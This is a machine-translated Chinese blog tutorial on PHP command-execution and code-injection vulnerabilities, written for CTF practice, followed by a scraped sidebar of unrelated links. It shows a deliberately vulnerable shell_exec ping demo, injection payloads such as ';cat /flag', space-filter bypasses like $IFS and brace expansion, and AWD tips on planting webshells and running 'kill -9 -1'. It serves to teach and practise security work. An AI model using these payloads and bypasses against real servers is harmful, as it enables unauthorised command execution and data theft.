当前位置:网站首页>Command Execution Vulnerability - command execution - vulnerability sites - code injection - vulnerability exploitation - joint execution - bypass (spaces, keyword filtering, variable bypass) - two ex
Command Execution Vulnerability - command execution - vulnerability sites - code injection - vulnerability exploitation - joint execution - bypass (spaces, keyword filtering, variable bypass) - two ex
2022-07-04 02:52:00 【qq_ fifty-one million five hundred and fifty thousand seven hun】
Command execution
Command execution is an attack , Its goal is to execute arbitrary commands on the host operating system through vulnerable applications . When the application needs to call some external programs to process the content , It will use some functions to execute system commands .
such as PHP Medium system,exec,shell_exec etc. , When the user can control the parameters in the command execution , Inject malicious system commands into normal commands , Cause command execution attacks .
A simple example is , For example, you want to create a directory , May not create with code , But I know that the system command is mkdir, With the help of system commands mkdir To create a directory .
give an example :cp /tmp/sourcefile /app/public/#{userinput}.jpg
cp yes copy Copy , take sourcefile Copy to the picture
If the user's input (userinput) yes aaa;cat /flag, Then it will read flag The content in
Command injection is a common Vulnerability form . Once there is a command injection vulnerability , An attacker can execute arbitrary commands on the target system .
Command injection attacks are often used to pass unsafe parameters to programs ( Command line arguments 、http head 、cookie).
Be careful : Command execution requires :
1. Execute system commands
2. System commands executed ( Parameters ) At least controllable ( Or partially controllable ), The place where parameters are transferred is the place where users can control
Command execution inheritance Web Server User's rights , Generally, you have permission to write files , Write horse 、 View private information 、 Steal source code , It can even bounce shell, Great harm .
( The user executed through the server php Code implementation executes system commands , So “ Command execution inheritance Web Server User's rights ”)
commonly Linux The highest permission is root,Web server It's usually www-data jurisdiction
Vulnerability site
The program filtering is not rigorous , So that users can inject and execute code .
High risk function :
eval(),assert(),preg_replace(),call_user_func() wait
For functions that execute commands , Parameter filtering is not rigorous , Cause direct command execution .
High risk function :
system(),exec(),shell_exec(),passthru(),pctnl_exec(),popen(),proc_open()
notes : Back quotes are shell_exec() Another name for
such as echo ls
Code injection
The program filtering is not rigorous , So that users can inject and execute code .
High risk vulnerability :
eval(),assert(),preg_replace(),call_user_func() wait
And command execution The difference is that :
An execution system command , An executive PHP Code
Exploit
Take a look at a Demo:
<?php
if (isset($_GET['ip'])){
$ip = $_GET['ip'];
echo shell_exec("ping -c 4 " . $ip);
}else{
highlight_file(__file__);
}
Under normal circumstances , Enter the host address , Then the command execution result is returned normally
In code ip The parameter is directly passed through GET Mode is passed in and directly brought into the command , At this time, try using the delimiter and adding a command
127.0.0.1;ls -l
Joint implementation
A semicolon
cmd1;cmd2;cmd3
cmd1 Will run first , No matter cmd1 Run successfully or error ,cmd2 Will run after it , When cmd2 When the command is complete ,cmd3 Will run
The three commands do not interfere with each other
&&
Sometimes I want to make sure that Linux In command , Only when the previous command ends successfully , The next command will be executed . That's logic and operators && Where it appears
cmd1 && cmd2 && cmd3
When the first command goes wrong ,&& The separator command will stop executing the following command .
||
You can use logical operators (||) Run command line , But run the next command only if the previous command fails :
cmd1 || cmd2 || cmd3
If cmd1 Run failed , Then run cmd2. If cmd2 The successful running ,cmd3 Will not run .
|
The result of the previous command is used as the parameter of the latter command
cmd1 | cmd2
for example :
echo xxx | base64
A newline
%0a
%0d
practice :actf2020exec platform BUUCTF
First try 127.0.0.1
127.0.0.1;ls
;cat /flag
obtain flag yes flag{3e9af367-c215-4a33-9196-4b5314327d9f}
Bypass
Filter space
$IFS
${IFS} // Add {} To distinguish ( interval )
$IFS$9
< // stay Linux in < Indicates import
<>
{cat,flag.php} // The space function is realized with comma , Need to use {} Cover up
%20
%09
Filter a keyword
Exercise questions :
Space filtering
Obviously, a lot of things are filtered :
It's wrong not to report :( Look at the source code and get flag)
flag{0af120ba-cd98-43e9-a099-3f9abac9de96}
Variable
( The one above GXYCTF It is an example of using variables to solve )
PS Add
1.awd In the game : Cannot delete others Horse
www-data and ctf/test Does not belong to a user group
terms of settlement : Write a horse for yourself , Connected by ant sword Web Shell, Through this Web shell Delete others Of Web shell
2. If the horse in others is every 1 Write a horse in seconds , How to solve ?
( If someone else's horse is written through a web page )
Write yourself a horse , Connect Web shell ( Make yourself www-data Group users ), To perform kill -9 -1
If the other party is ( Not through the web ):
Then I should execute :
3. rebound shell
If known IP And port number :
边栏推荐
- 2006 translation
- C learning notes: C foundation - Language & characteristics interpretation
- [Valentine's Day confession code] - Valentine's Day is approaching, and more than 10 romantic love effects are given to the one you love
- Advanced learning of MySQL -- Application -- storage engine
- Yyds dry goods inventory override and virtual of classes in C
- Node solves cross domain problems
- Is online futures account opening safe and reliable? Which domestic futures company is better?
- Comment la transformation numérique du crédit d'information de la Chine passe - t - elle du ciel au bout des doigts?
- Crawler practice website image batch download
- Bugku Zhi, you have to stop him
猜你喜欢
Learn these super practical Google browser skills, girls casually flirt
Yyds dry goods inventory override and virtual of classes in C
The "message withdrawal" of a push message push, one click traceless message withdrawal makes the operation no longer difficult
A brief talk on professional modeler: the prospect and professional development of 3D game modeling industry in China
1day vulnerability pushback skills practice (3)
There is no need to authorize the automatic dream weaving collection plug-in for dream weaving collection
This function has none of DETERMINISTIC, NO SQL..... (you *might* want to use the less safe log_bin_t
Advanced learning of MySQL -- Application -- storage engine
Ningde times and BYD have refuted rumors one after another. Why does someone always want to harm domestic brands?
Redis transaction
随机推荐
Résumé: entropie, énergie libre, symétrie et dynamique dans le cerveau
15. System limitations and options
Bugku Zhi, you have to stop him
Lichuang EDA learning notes 14: PCB board canvas settings
Osnabrueck University | overview of specific architectures in the field of reinforcement learning
Summarize the past to motivate yourself to move on
Properties of binary trees (numerical aspects)
High level application of SQL statements in MySQL database (I)
Chain ide -- the infrastructure of the metauniverse
Problems and solutions of several concurrent scenarios of redis
Tsinghua University product: penalty gradient norm improves generalization of deep learning model
2006 translation
Remember another interview trip to Ali, which ends on three sides
Amélioration de l'efficacité de la requête 10 fois! 3 solutions d'optimisation pour résoudre le problème de pagination profonde MySQL
Gee import SHP data - crop image
VRRP+BFD
Pagoda SSL can't be accessed? 443 port occupied? resolvent
What is cloud primordial?
Www 2022 | taxoenrich: self supervised taxonomy complemented by Structural Semantics
17. File i/o buffer